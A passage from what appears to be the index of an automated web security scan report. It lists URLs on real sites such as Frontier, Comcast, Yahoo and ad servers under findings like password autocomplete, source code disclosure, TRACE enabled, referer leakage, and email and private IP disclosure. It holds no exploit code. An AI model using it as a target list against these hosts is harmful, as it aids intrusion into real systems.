10.31. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=300x250_rgt&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568
10.32. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=954x60_spon&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568
10.33. http://ads.pointroll.com/PortalServe/
10.34. http://adserver.teracent.net/tase/ad
10.35. http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp
10.36. http://ak1.abmr.net/is/www.burstnet.com
10.37. http://autos.yahoo.com/darla/fc.php
10.38. http://autos.yahoo.com/darla/md.php
10.39. http://b.scorecardresearch.com/b
10.40. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1
10.41. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1
10.42. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI
10.43. http://ehg-verizon.hitbox.com/HG
10.44. http://espanol.vonage.com/mpel.js
10.45. http://external.dmtracker.com/tags/vs.js
10.46. http://finance.yahoo.com/
10.47. http://finance.yahoo.com/q
10.48. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
10.49. http://forums.comcast.com/t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message
10.50. http://forums.comcast.com/t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36
10.51. http://frontier.com/AgentOrdering/customAppTabInfo/docobj.js
10.52. http://frontier.com/AgentOrdering/customAppTabInfo/tabNavigation.js
10.53. http://frontier.com/AgentOrdering/customAppTabInfo/tabSetup.js
10.54. http://frontier.com/AgentOrdering/javascripts/AgentOrdering.js
10.55. http://frontier.com/AgentOrdering/javascripts/validateinteger.js
10.56. http://frontier.com/Controls/VirtualCode.ashx
10.57. http://frontier.com/Js/formHelpers.js
10.58. http://frontier.com/Js/jQuery/jquery-1.4.4.min.js
10.59. http://frontier.com/Js/jQuery/jquery.maskedinput.js
10.60. http://frontier.com/Js/s_code.js
10.61. http://frontier.com/Resources/3rdParty/HBX/hbx.js
10.62. http://frontier.com/Resources/3rdParty/JQuery/jq.client.plugin.js
10.63. http://frontier.com/Resources/3rdParty/JQuery/jquery-1.4.2.min.js
10.64. http://frontier.com/Resources/3rdParty/JQuery/jquery-jtemplates.js
10.65. http://frontier.com/Resources/3rdParty/JQuery/jquery-ui.min.js
10.66. http://frontier.com/Resources/3rdParty/JQuery/jquery.json-2.2.js
10.67. http://frontier.com/images/FTRMain/frontier_Logo.jpg
10.68. http://frontier.com/images/FTRMain/gradientBox.png
10.69. http://frontier.com/images/FTRMain/small_arrow.png
10.70. http://frontier.com/images/icon_print.gif
10.71. http://frontier.com/js/jquery/jquery.numeric.js
10.72. http://frontier.my.yahoo.com/
10.73. http://frontier.my.yahoo.com/e/js
10.74. http://gdyn.pgatour.com/1.1/1.gif
10.75. http://int.teracent.net/tase/int
10.76. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/
10.77. http://maps.yahoo.com/
10.78. http://marketing.aptela.com/js/mktFormSupport.js
10.79. http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/
10.80. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js
10.81. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js
10.82. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js
10.83. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js
10.84. http://optimized-by.rubiconproject.com/a/dk.js
10.85. http://pixel.fetchback.com/serve/fb/pdc
10.86. http://pixel.quantserve.com/api/segments.json
10.87. http://pixel.quantserve.com/pixel
10.88. http://r1-ads.ace.advertising.com/site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443
10.89. http://r1-ads.ace.advertising.com/site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443
10.90. http://redirect.rtrk.com/redirect
10.91. http://sales.liveperson.net/hc/21807557/
10.92. http://sales.liveperson.net/hc/21807557/
10.93. http://sales.liveperson.net/hc/21807557/
10.94. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**
10.95. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**
10.96. http://sdc.usps.com/dcs731qdj000004f27giixw3q_2i4w/dcs.gif
10.97. http://sdc.usps.com/dcsq8lc5w10000sxojnpk5m85_1i5u/dcs.gif
10.98. http://sensor2.suitesmart.com/sensor4.js
10.99. http://sports.yahoo.com/mlb/recap
10.100. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad
10.101. http://testdm.travelers.com/trvwics.gif
10.102. http://thesearchagency.net/pixspike.php
10.103. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif
10.104. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif
10.105. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif
10.106. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif
10.107. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif
10.108. http://tr.adinterax.com/re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif
10.109. http://udmserve.net/udm/img.fetch
10.110. http://utdi.reachlocal.com/
10.111. http://utdi.reachlocal.net/index.html
10.112. http://video.music.yahoo.com/up/fop/process/getPlaylistFOP.php
10.113. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx
10.114. http://www.aptela.com/mainstylesheet.css/
10.115. http://www.aptela.com/misc/privacy-policy/
10.116. http://www.aptela.com/my-account/
10.117. http://www.aptela.com/my-account/login-error/
10.118. http://www.burstnet.com/enlightn/8117/3E06/
10.119. http://www.comcast.com/includes/js/CookieHelper.js
10.120. http://www.comcast.com/includes/omniture/s_code.js
10.121. https://www.comcast.com/Localization/Localize.cspx
10.122. https://www.comcast.com/includes/js/IDGenerator.ashx
10.123. http://www.fairpoint.com/residential/
10.124. http://www.fairpoint.com/servlet/CityTelcoMappingServlet
10.125. http://www.frontier.com/Js/s_code.js
10.126. http://www.frontierpages.com/SelectRegion.asp
10.127. http://www.frontierpages.com/scripts/s_code.js
10.128. http://www.googleadservices.com/pagead/aclk
10.129. http://www.myfitv.com/
10.130. http://www.myfitv.com/portal/recent_tv_elastic
10.131. http://www.myfitv.com/search
10.132. http://www.zillow.com/app
11. Password field with autocomplete enabled
11.1. https://login.comcast.net/login
11.2. https://login.frontier.com/webmail/
11.3. https://login.yahoo.com/config/login_verify2
11.4. http://www.aptela.com/my-account/
11.5. http://www.aptela.com/my-account/login-error/
11.6. https://www.frontier.com/AgentOrdering/Login/
11.7. https://www.frontier.com/AgentOrdering/Login/Default.aspx
11.8. https://www.frontier.com/BillPay/Login.aspx
11.9. https://www.frontier.com/Shop/Login.aspx
11.10. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp
11.11. https://www.usps.com/ContentTemplates/common/scripts/login.js
11.12. http://www.vonage.com/
11.13. http://www.whitefence.com/404.html
11.14. http://www.whitefence.com/category/high-speed-internet/
11.15. http://www.whitefence.com/category/home-phone/
11.16. http://www.whitefence.com/category/television-service/
12. Source code disclosure
12.1. http://frontier.my.yahoo.com/
12.2. http://www.aptela.com/my-account/
12.3. http://www.aptela.com/my-account/login-error/
13. Referer-dependent response
13.1. http://f.fontdeck.com/f/1/UnpieXVSR28AA7Cv3GOxYcB89VHRVvBqMwFQ9b3VRyke4HZ7P/EWPkEAXwkDOVohF4s.woff
13.2. http://f.fontdeck.com/f/1/Vi1LOEoyZW4AA6pm5SJGQPz72LalyhhI+uxdkhuANBvJEvI+4T8YXDfR3UumYtuUpEk.woff
13.3. http://f.fontdeck.com/f/1/a0N6UXFHczAAA0WmC7b6dK/aE1ZT8/xDkjgbvfJJQv5tfqEce3ZHfAPojbj35w3fFhI.woff
13.4. http://f.fontdeck.com/f/1/bC1qWXhHMTIAA0H0YIndj9WLf+b1HyVPSq0Ne1BGQpWtkDR8eRpfxZdXphw4Obn5Lhs.woff
13.5. http://ichart.finance.yahoo.com/instrument/1.0/%5EDJI/chart
13.6. http://sitesearch.comcast.com/
13.7. http://use.typekit.com/k/apb3goi-d.css
13.8. http://www.facebook.com/plugins/like.php
13.9. http://www.facebook.com/plugins/likebox.php
13.10. http://www.whitefence.com/category/high-speed-internet/
13.11. http://www.whitefence.com/category/home-phone/
13.12. http://www.whitefence.com/category/television-service/
14. Cross-domain POST
14.1. https://login.frontier.com/webmail/
14.2. http://www.aptela.com/lp2011/T2V1/
14.3. http://www.aptela.com/lp2011/T2V1/
14.4. http://www.frontierhelp.com/frontiernetnews.cfm
14.5. http://www.frontierhelp.com/techsupport.cfm
15. Cross-domain Referer leakage
15.1. http://ad.agkn.com/iframe!t=1129!
15.2. http://ad.agkn.com/iframe!t=1131!
15.3. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2
15.4. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11
15.5. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12
15.6. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396
15.7. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400
15.8. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2
15.9. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.101
15.10. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.102
15.11. http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36
15.12. http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36
15.13. http://ad.doubleclick.net/adj/N3880.SD153730.3880/B5030675.119
15.14. http://ad.doubleclick.net/adj/N4559.300587.YAHOO-INC.COM/B5825212.3
15.15. http://ad.doubleclick.net/adj/N4559.300587.YAHOO-INC.COM/B5825212.3
15.16. http://ad.doubleclick.net/adj/N6092.yahoo.com/B5098223.114
15.17. http://ad.doubleclick.net/adj/ober.frontier/product_119282623
15.18. http://ad.doubleclick.net/adj/ober.frontier/product_undefined
15.19. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599
15.20. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**
15.21. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877
15.22. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**
15.23. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208
15.24. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**
15.25. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276
15.26. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063
15.27. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**
15.28. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**
15.29. http://ad.yieldmanager.com/iframe3
15.30. http://ad.yieldmanager.com/iframe3
15.31. http://ad.yieldmanager.com/iframe3
15.32. http://ad.yieldmanager.com/iframe3
15.33. http://ad.yieldmanager.com/iframe3
15.34. http://ad.yieldmanager.com/iframe3
15.35. http://ad.yieldmanager.com/iframe3
15.36. http://ad.yieldmanager.com/iframe3
15.37. http://ad.yieldmanager.com/iframe3
15.38. http://ad.yieldmanager.com/iframe3
15.39. http://ad.yieldmanager.com/iframe3
15.40. http://ad.yieldmanager.com/iframe3
15.41. http://ad.yieldmanager.com/iframe3
15.42. http://admin.brightcove.com/js/BrightcoveExperiences_all.js
15.43. http://adserver.teracent.net/tase/ad
15.44. http://adserver.teracent.net/tase/ad
15.45. http://as.casalemedia.com/j
15.46. http://as.casalemedia.com/j
15.47. http://as.casalemedia.com/j
15.48. http://as.casalemedia.com/j
15.49. http://as.casalemedia.com/j
15.50. http://as1.suitesmart.com/99917/G15493.js
15.51. http://autos.yahoo.com/darla/fc.php
15.52. http://autos.yahoo.com/darla/fc.php
15.53. http://beacon.dedicatednetworks.com/js/t.aspx
15.54. http://cm.g.doubleclick.net/pixel
15.55. http://cm.g.doubleclick.net/pixel
15.56. http://cm.g.doubleclick.net/pixel
15.57. http://customer.comcast.com/Pages/FAQDisplay.aspx
15.58. http://customer.comcast.com/Pages/FAQViewer.aspx
15.59. http://finance.yahoo.com/lookup
15.60. http://finance.yahoo.com/q
15.61. http://frontier.com/winwin1
15.62. http://games.frontier.com/game.htm
15.63. http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**
15.64. http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp
15.65. http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*http://ad.doubleclick.net/click
15.66. http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*http://adclick.g.doubleclick.net/aclk
15.67. http://ib.adnxs.com/seg
15.68. http://ib.adnxs.com/ttj
15.69. http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js
15.70. http://l.yimg.com/p/social_buttons/facebook-share-iframe.php
15.71. http://l.yimg.com/zz/combo
15.72. http://l.yimg.com/zz/combo
15.73. http://l.yimg.com/zz/combo
15.74. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/
15.75. https://login.comcast.net/myaccount/lookup
15.76. https://login.frontiermobile.com/
15.77. https://login.yahoo.com/config/login_verify2
15.78. http://maps.yahoo.com/darla_fc
15.79. http://maps.yahoo.com/darla_fc
15.80. http://maps.yahoo.com/pvproxy
15.81. http://new.music.yahoo.com/recommendedHP/
15.82. http://omg.yahoo.com/xhr/ad/LREC/2115806991
15.83. http://pixel.everesttech.net/2565/c
15.84. http://pro.tweetmeme.com/button.js
15.85. http://realestate.yahoo.com/darla/fc.php
15.86. http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale
15.87. http://redirect.rtrk.com/redirect
15.88. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**
15.89. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**
15.90. http://search.keywordblocks.com/
15.91. http://search.keywordblocks.com/
15.92. http://search.yahoo.com/search
15.93. http://shop.comcast.com/XFINITY/voice/
15.94. http://shopping.yahoo.com/search
15.95. http://show.partners-z.com/s/show
15.96. http://sitesearch.comcast.com/
15.97. http://sports.yahoo.com/mlb/recap
15.98. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad
15.99. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad
15.100. http://udmserve.net/udm/img.fetch
15.101. https://us.etrade.com/e/t/jumppage/viewjumppage
15.102. http://utdi.reachlocal.com/
15.103. http://utdi.reachlocal.net/index.html
15.104. http://view.atdmt.com/TR1/iview/332867993/direct/01
15.105. http://view.atdmt.com/TR1/iview/332867993/direct/01
15.106. http://view.atdmt.com/TR1/iview/332867993/direct/01
15.107. http://view.atdmt.com/TR1/iview/332867993/direct/01
15.108. http://view.atdmt.com/ULA/iview/351127232/direct/01
15.109. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx
15.110. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx
15.111. http://www.aptela.com/lp2011/T2V1/
15.112. http://www.comcast.com/Corporate/Customers/contactus/ContactUs.html
15.113. https://www.comcast.com/Localization/Localize.cspx
15.114. http://www.facebook.com/plugins/activity.php
15.115. http://www.facebook.com/plugins/likebox.php
15.116. http://www.facebook.com/plugins/likebox.php
15.117. http://www.facebook.com/plugins/likebox.php
15.118. http://www.google.com/search
15.119. http://www.myfitv.com/javascripts/all.js
15.120. http://www.myfitv.com/search
15.121. http://www.myfitv.com/search
15.122. http://www.scottrade.com/online-trading.html
15.123. http://www.vonage.com/
15.124. http://www.vonage.com/search.php
15.125. http://www.xfinity.com/js-api/compressed/xpbar.js
15.126. http://www.xfinity.com/js-api/compressed/xpbar.js
15.127. http://xfinity.comcast.net/xpbar/1/default/
15.128. http://xfinity.comcast.net/xpbar/2/default/
15.129. http://yp.frontierpages.com/results.aspx
16. Cross-domain script include
16.1. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2
16.2. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11
16.3. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12
16.4. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396
16.5. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400
16.6. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2
16.7. http://ad.yieldmanager.com/iframe3
16.8. http://ad.yieldmanager.com/iframe3
16.9. http://ad.yieldmanager.com/iframe3
16.10. http://ad.yieldmanager.com/iframe3
16.11. http://autos.yahoo.com/
16.12. http://autos.yahoo.com/bentley/continental-gtc/2011/
16.13. http://cdn.optmd.com/V2/80181/197812/index.html
16.14. http://cdn.optmd.com/V2/80181/197813/index.html
16.15. http://customer.comcast.com/Pages/FAQViewer.aspx
16.16. http://finance.yahoo.com/
16.17. http://finance.yahoo.com/lookup
16.18. http://finance.yahoo.com/q
16.19. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
16.20. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/780566
16.21. http://forums.comcast.com/t5/user/viewprofilepage/user-id/3616087
16.22. http://frontier.my.yahoo.com/
16.23. http://l.yimg.com/p/social_buttons/facebook-share-iframe.php
16.24. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/
16.25. https://login.comcast.net/myaccount/lookup
16.26. https://login.yahoo.com/config/login_verify2
16.27. http://maps.yahoo.com/
16.28. http://movies.yahoo.com/
16.29. http://new.music.yahoo.com/
16.30. http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/
16.31. http://omg.yahoo.com/
16.32. http://pro.tweetmeme.com/button.js
16.33. http://realestate.yahoo.com/
16.34. http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale
16.35. http://servicetips.whitefence.com/
16.36. http://shopping.yahoo.com/
16.37. http://shopping.yahoo.com/search
16.38. http://sitesearch.comcast.com/
16.39. http://sports.yahoo.com/
16.40. http://sports.yahoo.com/
16.41. http://sports.yahoo.com/mlb/recap
16.42. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad
16.43. http://support.aptela.com:9000/tools/ResetPassword.cgi
16.44. http://udmserve.net/udm/img.fetch
16.45. https://us.etrade.com/e/t/jumppage/viewjumppage
16.46. http://utdi.reachlocal.net/index.html
16.47. http://view.atdmt.com/TR1/iview/332867993/direct/01
16.48. http://www.aptela.com/lp2011/T2V1/
16.49. http://www.aptela.com/mainstylesheet.css/
16.50. http://www.aptela.com/misc/privacy-policy/
16.51. http://www.aptela.com/my-account/
16.52. http://www.aptela.com/my-account/login-error/
16.53. http://www.comcast.com/Corporate/Customers/custcare.html
16.54. http://www.comcast.com/Movers/Move.cspx
16.55. https://www.comcast.com/Localization/Localize.cspx
16.56. https://www.comcastsupport.com/ChatEntry/
16.57. https://www.comcastsupport.com/chatentry/Default.aspx
16.58. http://www.facebook.com/plugins/activity.php
16.59. http://www.facebook.com/plugins/likebox.php
16.60. http://www.fairpoint.com/residential/
16.61. http://www.frontier.com/
16.62. http://www.myfitv.com/
16.63. http://www.myfitv.com/portal/recent_tv_elastic
16.64. http://www.myfitv.com/search
16.65. http://www.ooma.com/
16.66. http://www.ooma.com/premier
16.67. http://www.ooma.com/premier/features
16.68. http://www.vonage.com/
16.69. http://www.whitefence.com/404.html
16.70. http://www.whitefence.com/category/high-speed-internet/
16.71. http://www.whitefence.com/category/home-phone/
16.72. http://www.whitefence.com/category/television-service/
17. TRACE method is enabled
17.1. http://40.xg4ken.com/
17.2. http://ads.media.net/
17.3. http://gdyn.pgatour.com/
17.4. http://integrate.112.2o7.net/
17.5. https://login.aptela.com/
17.6. http://mi.adinterax.com/
17.7. http://optimized-by.rubiconproject.com/
17.8. http://pixel.everesttech.net/
17.9. http://pixel.fetchback.com/
17.10. http://sensor2.suitesmart.com/
17.11. http://show.partners-z.com/
17.12. http://sitesearch.comcast.com/
17.13. http://support.aptela.com:9000/
17.14. http://www.aptela.com/
17.15. http://www.fairpoint.com/
17.16. http://www.myfitv.com/
17.17. http://www.ooma.com/
17.18. http://www.pgatour.com/
17.19. http://www.vonage.com/
17.20. http://www.whitefence.com/
17.21. http://www2.whitefence.com/
18. Email addresses disclosed
18.1. http://autos.yahoo.com/bentley/continental-gtc/2011/
18.2. http://forums.comcast.com/html/js/s_code.js
18.3. http://games.frontier.com/BodyScripts.aspx
18.4. http://games.frontier.com/game.htm
18.5. http://l.yimg.com/a/combo
18.6. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/
18.7. https://login.comcast.net/myaccount/js/omniture.js
18.8. https://login.comcast.net/static/js/omniture.js
18.9. https://login.yahoo.com/config/login_verify2
18.10. http://postcalc.usps.gov/
18.11. http://sitesearch.comcast.com/
18.12. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad
18.13. http://utdi.reachlocal.net/index.html
18.14. http://www.aptela.com/mainstylesheet.css/
18.15. http://www.aptela.com/misc/privacy-policy/
18.16. http://www.aptela.com/my-account/
18.17. http://www.aptela.com/my-account/login-error/
18.18. http://www.comcast.com/Movers/Move.cspx
18.19. https://www.comcastsupport.com/ChatEntry/js/jquery.cookie.js
18.20. https://www.comcastsupport.com/ChatEntry/js/jquery.jqprint.js
18.21. https://www.comcastsupport.com/ChatEntry/js/jquery.mb.menu/mbMenu.js
18.22. https://www.comcastsupport.com/ChatEntry/js/plugins/jquery.hoverIntent.js
18.23. https://www.comcastsupport.com/ChatEntry/js/plugins/jquery.metadata.js
18.24. http://www.fairpoint.com/scripts/jquery/plugins/selectToUISlider.jQuery.js
18.25. http://www.frontier.com/yahoo/js/CCallWrapper.js
18.26. http://www.frontierhelp.com/frontiernetnews.cfm
18.27. http://www.frontierhelp.com/func.js
18.28. https://www.frontiermobile.com/data/Js/s_code.js
18.29. http://www.frontierpages.com/scripts/s_code.js
18.30. http://www.myfitv.com/javascripts/all.js
18.31. http://www.myfitv.com/javascripts/jquery.hoverIntent.js
18.32. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp
18.33. https://www.optionshouse.com/tool/2011.09.01.19.07/asset/coreuiConcatMin.js
18.34. https://www.usps.com/ContentTemplates/assets/css/components.css
18.35. https://www.usps.com/ContentTemplates/assets/css/home.css
18.36. https://www.usps.com/ContentTemplates/assets/css/templates.css
18.37. https://www.usps.com/ContentTemplates/common/css/fonts.css
18.38. https://www.usps.com/ContentTemplates/common/css/globals/button-styles.css
18.39. https://www.usps.com/ContentTemplates/common/css/globals/links.css
18.40. https://www.usps.com/ContentTemplates/common/css/globals/modals.css
18.41. https://www.usps.com/ContentTemplates/common/css/globals/qt-modals.css
18.42. https://www.usps.com/ContentTemplates/common/css/globals/text-fields.css
18.43. https://www.usps.com/ContentTemplates/common/css/globals/tooltips.css
18.44. https://www.usps.com/ContentTemplates/common/css/globals/widgets/modal-fluid/modal-fluid.css
18.45. https://www.usps.com/ContentTemplates/common/css/usps-print.css
18.46. https://www.usps.com/ContentTemplates/common/css/usps.css
18.47. https://www.usps.com/ContentTemplates/common/scripts/usps/modules/usps/widget/carousel.js
18.48. https://www.usps.com/ContentTemplates/common/scripts/usps/modules/usps/widget/homecarousel.js
18.49. http://www.vonage.com/googlesearch/cluster.js
18.50. http://www.vonage.com/googlesearch/common.js
18.51. http://www.vonage.com/googlesearch/uri.js
19. Private IP addresses disclosed
19.1. http://api.facebook.com/restserver.php
19.2. http://connect.facebook.net/en_US/all.js
19.3. http://customer.comcast.com/Pages/FAQDisplay.aspx
19.4. http://external.ak.fbcdn.net/safe_image.php
19.5. http://external.ak.fbcdn.net/safe_image.php
19.6. http://external.ak.fbcdn.net/safe_image.php
19.7. http://external.ak.fbcdn.net/safe_image.php
19.8. http://external.ak.fbcdn.net/safe_image.php
19.9. http://external.ak.fbcdn.net/safe_image.php
19.10. http://external.ak.fbcdn.net/safe_image.php
19.11. http://external.ak.fbcdn.net/safe_image.php
19.12. http://frontier.com/AgentOrdering/customAppTabInfo/docobj.js
19.13. http://frontier.com/AgentOrdering/customAppTabInfo/tabNavigation.js
